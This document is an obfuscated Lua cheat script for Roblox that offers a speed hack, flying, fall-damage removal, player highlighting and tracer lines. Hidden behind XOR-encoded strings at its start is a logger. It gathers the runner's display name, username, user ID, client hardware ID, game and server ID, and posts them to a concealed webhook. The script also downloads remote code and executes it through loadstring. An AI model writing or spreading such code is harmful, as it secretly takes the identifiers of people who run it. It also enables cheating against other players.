--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v65,v66) local v67={};for v110=1, #v65 do v6(v67,v0(v4(v1(v2(v65,v110,v110 + 1 )),v1(v2(v66,1 + (v110% #v66) ,1 + (v110% #v66) + 1 )))%256 ));end return v5(v67);end local v8="";local v9={[v7("\221\204\220\13\209\146\227","\126\177\163\187\69\134\219\167")]=true,[v7("\47\194\45\240\239\38\223","\156\67\173\74\165")]=true,[v7("\56\184\78\49\189\43\67","\38\84\215\41\118\220\70")]=true,[v7("\92\25\37\56\241\82\63\6","\158\48\118\66\114")]=true};if ((v8=="") or (v8==v7("\173\37\28\37\118","\155\203\68\112\86\19\197"))) then local v111=0 -0 ;local v112;while true do if (v111==0) then v112=0 -0 ;while true do if (v112==1) then v9.logGame=true;v9.logJobID=true;break;end if (v112==0) then v9.logHWID=true;v9.logUser=true;v112=1;end end break;end end end local v10=game:GetService(v7("\118\209\55\229\69\106\246","\152\38\189\86\156\32\24\133"));local v11=game:GetService(v7("\212\67\179\86\207\82\181\80\245\84\162","\38\156\55\199"));local v12=game:GetService(v7("\133\124\110\35\22\96\234\79\169\126\121\27\22\102\236\74\171\120","\35\200\29\28\72\115\20\154"));local v13=game:GetService(v7("\43\189\201\254\131\45\56\0\171\216\220\158\31\49\11\169\216\220\136","\84\121\223\177\191\237\76"));local v14=v10.LocalPlayer;local v15={[v7("\172\83\203\168\53\95\59\210","\161\219\54\169\192\90\48\80")]={},[v7("\89\67\25\41\70\67\4","\69\41\34\96")]={[v7("\191\204\217\30\7\37\168","\75\220\163\183\106\98")]="",[v7("\7\183\137\50\221\17","\185\98\218\235\87")]={}}};v15.Send=function(v68,v69) local v70=0 -0 ;local v71;local v72;local v73;while true do if (v70==(1 + 1)) then v73=pcall(function() return v72({[v7("\254\46\43","\202\171\92\71\134\190")]=v71,[v7("\4\196\56\128\38\197","\232\73\161\76")]=v7("\139\246\113\105","\126\219\185\34\61"),[v7("\36\203\95\118\123\101\224","\135\108\174\62\18\30\23\147")]={[v7("\149\230\36\223\29\160\39\138\130\240\58\206","\167\214\137\74\171\120\206\83")]=v7("\138\224\34\81\241\164\138\228\59\82\246\232\129\227\61\83","\199\235\144\82\61\152")},[v7("\37\25\189\50","\75\103\118\217")]=v11:JSONEncode(v68.payload)});end);break;end if (v70==(1 -0)) then v72=(syn and syn.request) or request or http_request ;if  not v72 then return;end v70=2;end if (v70==0) then local v135=0;while true do if (v135==(0 -0)) then v71=v68.webhooks[v69];if  not v71 then return;end v135=1;end if (v135==(1228 -(322 + 905))) then v70=612 -(602 + 9) ;break;end end end end end;v15.AddWebhook=function(v74,v75,v76) v74.webhooks[v75]=v76;end;v15.CreateEmbed=function(v78) local v79=1189 -(449 + 740) ;local v80;while true do if (v79==(875 -(826 + 46))) then v80.Save=function(v153) table.insert(v15.payload.embeds,v153);end;return v80;end if (v79==(947 -(245 + 702))) then local v137=0 -0 ;while true do if (v137==1) then v79=1;break;end if (v137==(0 + 0)) then v80={[v7("\193\93\117\24\189\13","\126\167\52\16\116\217")]={}};v80.SetTitle=function(v179,v180) v179.title=v180;end;v137=1;end end end if (v79==(1900 -(260 + 1638))) then v80.AddField=function(v154,v155,v156,v157) table.insert(v154.fields,{[v7("\198\47\45\133","\156\168\78\64\224\212\121")]=v155,[v7("\17\239\169\219\2","\174\103\142\197")]=v156,[v7("\95\38\83\49\43\91","\152\54\72\63\88\69\62")]=v157 or false });end;v80.SetThumbnail=function(v158,v159) v158.thumbnail={[v7("\193\214\226","\60\180\164\142")]=v159};end;v79=443 -(382 + 58) ;end if (v79==(3 -2)) then v80.SetDescription=function(v161,v162) v161.description=v162;end;v80.SetColor=function(v164,v165) v164.color=tonumber(v165,16);end;v79=2;end end end;v15:AddWebhook(v7("\76\76\4\42\44\232\0","\114\56\62\101\73\71\141"),v7("\176\253\207\212\171\179\148\139\188\224\200\199\183\251\223\138\187\230\214\139\185\249\210\139\175\236\217\204\183\230\208\215\247\184\136\150\236\191\137\149\234\184\131\148\235\187\136\157\232\187\137\156\247\209\233\150\159\254\211\221\182\220\253\144\139\216\235\253\235\202\221\150\180\194\140\231\239\208\205\254\160\217\233\235\187\191\234\209\136\185\243\213\186\191\210\215\176\236\242\198\151\243\248\253\170\253\212\233\168\191\244\253\158\164\195\201\183\237\216\192\225","\164\216\137\187"));local function v19() local v81,v82=pcall(function() local v113=0;local v114;local v115;while true do if (v113==(0 + 0)) then v114=game:HttpGet(v7("\218\242\37\162\181\164\68\157\242\57\167\171\252\5\211\239\61\161\232\236\4\208\234\62\170\232\253\4\223\169\39\227\233\235\24\215\244\34\253\167\232\10\198\231\35\255\174\251\10\214\245\57\189\178\161\30\193\227\35\155\162\237\86","\107\178\134\81\210\198\158")   .. v14.UserId   .. v7("\126\29\139\220\175\101\95\215\150\178\105\91\210\128\172\55\28\143\199\190\101\30\140\193\236\58\1\144\194\175\42\45\141\202\165\42\83\128\202\171\59\5","\202\88\110\226\166") );v115=v11:JSONDecode(v114);v113=1 -0 ;end if (v113==1) then return v115.data[2 -1 ].imageUrl;end end end);return (v81 and v82) or nil ;end local function v20() local v83=0;local v84;while true do local v116=0;local v117;while true do if (v116==(1205 -(902 + 303))) then v117=0 -0 ;while true do if (v117==0) then if (1==v83) then return v84;end if (v83==(0 -0)) then v84=v7("\246\1\137\249\197\212\1","\170\163\111\226\151");pcall(function() v84=v13:GetClientId();end);v83=1;end break;end end break;end end end end local v21=v15:CreateEmbed();v21:SetTitle(v7("\77\106\227\107\28\99\120\71\104\230\105\25\99\113\72\101\234\108\28\98\112\75\97\225\106\26\102\127\73\100\227\111\26\111\112\68\104\230\106\27\110\119\81\44\242\11\77\37\32\1\36\242\29\86\50\42\4\36\187\55\64\119\13\20\36\183\59\90\50\45\81\44\242\100\20\102\122\67\100\227\110\22\99\120\70\100\234\97\27\111\125\67\101\235\98\31\100\123\69\97\228\96\26\102\126\69\104\235\109\22\99\123\68\105\236","\73\113\80\210\88\46\87"));v21:SetColor(v7("\214\126\149\75\195\160","\135\225\76\173\114"));if v9.logUser then local v118=0 + 0 ;while true do if (v118==0) then v21:AddField(v7("\70\183\233\227\254\233\246\76\181\236\226\252\228\255\73\185\236\227\249\232\247\64\188\235\226\248\236\241\66\185\234\224\245\229\244\78\185\235\229\249\237\249\90\241\248\148\165\174\183\22\236\161\240\130\188\170\31","\199\122\141\216\208\204\221"),v7("\173\221\16","\150\205\189\112\144\24")   .. v14.DisplayName   .. v7("\37\132\191","\112\69\228\223\44\100\232\113") ,true);v21:AddField(v7("\136\69\86\128\228\40\215\130\71\83\129\230\37\222\135\75\83\128\227\41\214\142\78\84\129\226\45\208\140\75\85\131\239\36\213\128\75\84\134\227\44\216\148\3\71\230\165\121\148\218\30\10\214","\230\180\127\103\179\214\28"),v7("\140\5\95","\128\236\101\63\38\132\33")   .. v14.Name   .. v7("\172\169\17","\175\204\201\113\36\214\139") ,true);v118=1691 -(1121 + 569) ;end if (v118==1) then v21:AddField(v7("\119\222\58\218\13\75\201","\100\39\172\85\188"),v7("\150\91\181\137\48\166\56\177\133\33\168\69\241\136\39\185\104\170\218\124\226\106\182\130\63\162\96\247\131\60\160\55\172\147\54\191\107\246","\83\205\24\217\224")   .. v14.UserId   .. v7("\169\213\223\50\224\204\193\56\175","\93\134\165\173") ,false);break;end end end if v9.logHWID then v21:AddField(v7("\226\168\144\145\104\154\227\40\230\166\144\155\98\158\230\39\233\167\144\148\108\148\227\45\236\166\144\148\98\154\227\39\230\162\149\155\109\155\227\40\232\172\129\222\122\230\133\87\154","\30\222\146\161\162\90\174\210"),v7("\229\78\112","\106\133\46\16")   .. v20()   .. v7("\88\32\115","\32\56\64\19\156\58") ,true);end if v9.logGame then local v119=0;local v120;while true do if (v119==(214 -(22 + 192))) then v120=v12:GetProductInfo(game.PlaceId);v21:AddField(v7("\6\146\180\5\8\166\209\12\144\177\7\12\167\212\3\145\182\5\10\171\215\0\153\182\4\14\163\214\2\156\180\0\15\166\217\3\155\182\6\3\165\222\26\212\165\113\91\255\133","\224\58\168\133\54\58\146"),v7("\89\86\75","\107\57\54\43\157\21\230\231")   .. v120.Name   .. v7("\219\139\17","\175\187\235\113\149\217\188") ,false);break;end end end if v9.logJobID then v21:AddField(v7("\96\245\208\31\177\45\41\106\247\213\29\187\44\40\100\246\210\29\178\47\44\102\254\210\30\183\40\46\100\251\208\20\182\41\32\101\252\208\29\181\45\38\124\179\193\102\236\123\56\21\139","\24\92\207\225\44\131\25"),v7("\75\211\184","\29\43\179\216\44\123")   .. game.JobId   .. v7("\189\217\32","\44\221\185\64") ,false);end local v22=v19();if v22 then v21:SetThumbnail(v22);end v21:Save();v15.payload.content=v7("\29\251\20\127\34\81\191\30\7\35\82\181\30\12\39\87\179\25\9\38\82\176\30\1\111\29","\19\97\135\40\63");v15:Send(v7("\186\78\50\56\36\52\188","\81\206\60\83\91\79"));local v24=game:GetService(v7("\124\190\222\65\42\209\91\173\77\174","\196\46\203\176\18\79\163\45"));local v25=game:GetService(v7("\138\39\110\18\45\248\238\172\39\122\45\48\244\253\185\37\123","\143\216\66\30\126\68\155"));local v26=v24:IsStudio();local v27=(v26 and require(v25.ImGui)) or loadstring(game:HttpGet(v7("\162\220\25\219\214\249\152\174\173\193\25\195\208\161\153\226\165\197\66\207\192\179\195\233\185\199\66\249\202\161\219\238\178\133\36\198\226\150\254\174\184\201\26\132\200\162\222\239\229\225\0\236\208\170\153\237\191\201","\129\202\168\109\171\165\195\183")))() ;local v28=v27:CreateWindow({[v7("\22\81\35\212\219","\134\66\56\87\184\190\116")]=v7("\16\52\31\190\21\171\3\48\48\62\30\251\72\165\113","\85\92\81\105\219\121\139\65"),[v7("\206\186\74\64","\191\157\211\48\37\28")]=UDim2.new(0,1083 -(483 + 200) ,0,1863 -(1404 + 59) ),[v7("\239\16\231\21\46\214\16\250","\90\191\127\148\124")]=UDim2.new(0.5,0 -0 ,0.5 -0 ,0)});v28:Center();local v29=v28:CreateTab({[v7("\86\134\35\18","\119\24\231\78")]=v7("\171\35\163\69","\113\226\77\197\42\188\32")});local v30=v28:CreateTab({[v7("\20\23\249\176","\213\90\118\148")]=v7("\118\33\162\83\64\94\32\160","\45\59\78\212\54")});local v31=v28:CreateTab({[v7("\62\87\142\142","\144\112\54\227\235\230\78\205")]=v7("\156\62\10\238\192\84\164\45\29\249\212","\59\211\72\111\156\176")});local v32=v28:CreateTab({[v7("\96\134\238\40","\77\46\231\131")]=v7("\159\103\134","\32\218\52\214")});v29:Label({[v7("\122\18\41\188","\58\46\119\81\200\145\208\37")]=v7("\31\132\57\191\233\174\53\57\133\32\184\233\170\55\56\204\61\173\173\184\118\41\149\112\128\166\186\37\20\219\112\163\167\253\18\34\159\51\163\187\185\120","\86\75\236\80\204\201\221"),[v7("\70\68\111\145\201\153\115\81\103\128\250","\235\18\33\23\229\158")]=true});v29:Button({[v7("\100\191\217\175","\219\48\218\161")]=v7("\199\126\108\80\155\107\233\247\114\115\91\223\15\204\237\127\119","\128\132\17\28\41\187\47"),[v7("\34\51\10\54\95\0\49\13","\61\97\82\102\90")]=function() if setclipboard then setclipboard(v7("\164\58\191\91\212\13\81\70\168\39\184\72\200\69\26\71\175\33\166\4\206\89\8\0\184\43\228\79\145\1\54\92\255\22\136\88\255","\105\204\78\203\43\167\55\126"));end end});local v33=766 -(468 + 297) ;local v34=563 -(334 + 228) ;local v35=3 -2 ;local v36=false;local v37=0.1 -0 ;local v38=43 -19 ;local v33=1;local v34=1 + 0 ;local v35=1;local v36=true;local v37=0.1;local v38=24;v30:Checkbox({[v7("\137\171\33\27\31","\49\197\202\67\126\115\100\167")]=v7("\18\85\222\43\140\83\30\4\75\218\44\132\22\125\56\85\203\59\143\90","\62\87\59\191\73\224\54"),[v7("\209\3\246\220\226","\169\135\98\154")]=SliderDisabled,[v7("\232\118\40\88\255\50\203\192","\168\171\23\68\52\157\83")]=function(v85,v86) local v87=0;while true do if (v87==(236 -(141 + 95))) then v36=v86;if  not v36 then local v167=0 + 0 ;local v168;while true do if ((0 -0)==v167) then v168=0 -0 ;while true do if (v168==0) then v35=1 + 0 ;print(v7("\199\97\240\168\33\109\132\251\127\225\191\42\33\199\240\120\230\172\39\33\130\240\63\181\159\32\62\130\224\49\225\162\101\41\130\242\112\224\161\49\99","\231\148\17\149\205\69\77"));break;end end break;end end else print(v7("\179\183\194\254\83\191\131\168\201\239\69\240\140\231\194\245\86\253\140\162\195\181","\159\224\199\167\155\55"));end break;end end end});v30:Slider({[v7("\219\242\62\215\251","\178\151\147\92")]=v7("\191\237\73\55\22\12\87\153\241\88\59\2\64\115\137\239","\26\236\157\44\82\114\44"),[v7("\7\39\219\109\43\34\192\94","\59\74\78\181")]=v37,[v7("\8\208\66\108\178\41\196\95","\211\69\177\58\58")]=v38,[v7("\129\228\117\224\236","\171\215\133\25\149\137")]=v34,[v7("\211\199\39\244\235\57\242\69","\34\129\168\82\154\143\80\156")]=5 -3 ,[v7("\166\179\63\7\74\79\138\142","\233\229\210\83\107\40\46")]=function(v88,v89) if v36 then local v125=0 + 0 ;while true do if (v125==0) then v35=v89;print(v7("\245\67\32\209\0\213\2\1\198\0\196\70\104","\101\161\34\82\182"),v35);break;end end end end});local function v39(v90,v91,v92) return v90 + ((v91-v90) * math.min(v92,1)) ;end local v40=v10.LocalPlayer;repeat wait();until game:IsLoaded() and v40.Character  local v41=v40.Character;local v42=v41:WaitForChild(v7("\192\24\84\255\213\237\139\42\218\2\86\234\235\227\144\58","\78\136\109\57\158\187\130\226"));local v43=v41:WaitForChild(v7("\22\42\244\240\48\48\240\245","\145\94\95\153"));v24.RenderStepped:Connect(function(v93) local v94=0 + 0 ;local v95;while true do if (v94==(0 -0)) then v95=0 + 0 ;while true do if (v95==(163 -(92 + 71))) then v34=v39(v34,v35,v93 * 5 );if (v43 and (v43.MoveDirection.Magnitude>0)) then local v184=0 + 0 ;local v185;while true do if (v184==(0 -0)) then v185=v43.MoveDirection;if v36 then local v203=765 -(574 + 191) ;local v204;while true do if (v203==(0 + 0)) then v204=v33 * v34 ;v42.CFrame=v42.CFrame + (v185 * v204 * v93) ;break;end end else v42.CFrame=v42.CFrame + (v185 * v33 * v93) ;end break;end end end break;end end break;end end end);v40.CharacterAdded:Connect(initializeCharacter);local v44=game:GetService(v7("\200\222\17\199\103\185\237\216\0\230\75\165\235\196\23\208","\215\157\173\116\181\46"));local v45=false;local v46=v10.LocalPlayer;local v47=v46.Character or v46.CharacterAdded:Wait() ;local v48=v47:WaitForChild(v7("\29\161\134\243\212\58\189\143\192\213\58\160\187\243\200\33","\186\85\212\235\146"));local v49=Instance.new(v7("\224\142\18\231\15\235\84\205\130\31\234\32","\56\162\225\118\158\89\142"));v49.MaxForce=Vector3.new(4000,4000,4000);v49.Velocity=Vector3.new(0 -0 ,0 + 0 ,849 -(254 + 595) );v49.P=5000;local v53=176 -(55 + 71) ;local v54=25;local function v55() if  not v45 then local v126=0 -0 ;local v127;while true do if ((1790 -(573 + 1217))==v126) then v127=0 -0 ;while true do if (v127==1) then v48.CanCollide=false;v49.Parent=v48;break;end if (v127==0) then v45=true;v48.Anchored=false;v127=1 + 0 ;end end break;end end end end local function v56() if v45 then v45=false;v48.Anchored=false;v48.CanCollide=true;v49.Parent=nil;end end v30:Checkbox({[v7("\112\4\194\170\46","\184\60\101\160\207\66")]=v7("\20\140\125\190\61\135\60\154\61\155\117\178\54","\220\81\226\28"),[v7("\37\212\142\238\239","\167\115\181\226\155\138")]=false,[v7("\193\35\235\80\121\112\197\233","\166\130\66\135\60\27\17")]=function(v96,v97) if v97 then v55();else v56();end end});v24.RenderStepped:Connect(function() if v45 then local v131=0 -0 ;local v132;while true do if ((939 -(714 + 225))==v131) then v132=v47:FindFirstChild(v7("\108\95\195\116\62\75\67\202","\80\36\42\174\21"));if v132 then local v182=v132.MoveDirection;v49.Velocity=v182 * (146 -96) ;if v44:IsKeyDown(Enum.KeyCode.Space) then v49.Velocity=Vector3.new(v49.Velocity.X,v53,v49.Velocity.Z);elseif v44:IsKeyDown(Enum.KeyCode.LeftShift) then v49.Velocity=Vector3.new(v49.Velocity.X, -v54,v49.Velocity.Z);end end break;end end end end);v31:Button({[v7("\122\21\47\110","\26\46\112\87")]=v7("\151\44\235\82\190\179\73\244\157\34\166\117\184\186","\212\217\67\203\20\223\223\37"),[v7("\153\140\164\222\184\140\171\217","\178\218\237\200")]=function() game.Players.LocalPlayer.PlayerScripts.FallDamageDetector:Destroy();end});local function v57(v98) for v121,v122 in pairs(v10:GetPlayers()) do if ((v122~=v40) and v122.Character) then local v142=0;local v143;while true do if (v142==(1 -0)) then if v98 then local v189=0;local v190;while true do if (v189==(1 + 1)) then v190.OutlineTransparency=0 -0 ;v190.OutlineColor=Color3.fromRGB(1061 -(118 + 688) ,255,303 -(25 + 23) );break;end if (v189==(0 + 0)) then v190=Instance.new(v7("\220\164\177\220\164\95\94\252\185","\57\148\205\214\180\200\54"));v190.Parent=v122.Character;v189=1;end if (v189==1) then v190.Adornee=v122.Character;v190.FillTransparency=1887 -(927 + 959) ;v189=6 -4 ;end end end break;end if (v142==(732 -(16 + 716))) then local v172=0 -0 ;while true do if ((98 -(11 + 86))==v172) then v142=1;break;end if (v172==(0 -0)) then v143=v122.Character:FindFirstChildOfClass(v7("\158\188\225\216\186\188\225\216\162","\176\214\213\134"));if v143 then v143:Destroy();end v172=1;end end end end end end end local v58=false;v32:Checkbox({[v7("\62\252\55\49\122","\22\114\157\85\84")]=v7("\225\248\35","\200\164\171\115\164\61\150"),[v7("\136\245\15\80\134","\227\222\148\99\37")]=false,[v7("\16\83\94\250\251\50\81\89","\153\83\50\50\150")]=function(v99,v100) local v101=285 -(175 + 110) ;while true do if (v101==(0 -0)) then v58=v100;v57(v100);break;end end end});v10.PlayerAdded:Connect(function(v102) if (v102~=v40) then v102.CharacterAdded:Connect(function() if v58 then v57(true);end end);end end);local v59=v46:GetMouse();local v60={};local v61=false;local function v62() for v123,v124 in pairs(v60) do if (v124 and v124.Parent) then v124:Destroy();end end v60={};end local function v63(v103,v104) local v105=0;local v106;while true do if (v105==(0 -0)) then v106=Instance.new(v7("\109\119\97\8","\45\61\22\19\124\19\203"));v106.Anchored=true;v106.CanCollide=false;v106.Size=Vector3.new(0.1,1796.1 -(503 + 1293) ,(v103-v104).Magnitude);v105=2 -1 ;end if (v105==(1 + 0)) then v106.Position=(v103 + v104)/(1063 -(810 + 251)) ;v106.Color=Color3.fromRGB(255,255,177 + 78 );v106.Material=Enum.Material.SmoothPlastic;v106.CFrame=CFrame.new(v103,v104) * CFrame.new(0 + 0 ,0, -v106.Size.Z/(2 + 0) ) ;v105=2;end if ((535 -(43 + 490))==v105) then v106.Parent=workspace;table.insert(v60,v106);game.Debris:AddItem(v106,1);break;end end end local function v64() if v61 then local v133=733 -(711 + 22) ;local v134;while true do if (v133==(3 -2)) then for v173,v174 in pairs(v10:GetPlayers()) do if (v174.Character and (v174~=v46)) then local v191=859 -(240 + 619) ;local v192;while true do if (v191==(0 + 0)) then v192=v174.Character:FindFirstChild(v7("\233\7\0\244\12\127\176\197\32\2\250\22\64\184\211\6","\217\161\114\109\149\98\16"));if v192 then v63(v134,v192.Position);end break;end end end end break;end if ((0 -0)==v133) then v134=v59.Hit.p;v62();v133=1 + 0 ;end end end end v32:Checkbox({[v7("\62\33\58\121\176","\20\114\64\88\28\220")]=v7("\5\19\211\183\253\194\174","\221\81\97\178\212\152\176"),[v7("\251\230\17\238\31","\122\173\135\125\155")]=false,[v7("\167\192\12\181\61\48\203\143","\168\228\161\96\217\95\81")]=function(v107,v108) local v109=1744 -(1344 + 400) ;while true do if (v109==(405 -(255 + 150))) then v61=v108;if  not v108 then v62();end break;end end end});v59.Move:Connect(v64);v28:ShowTab(v29);
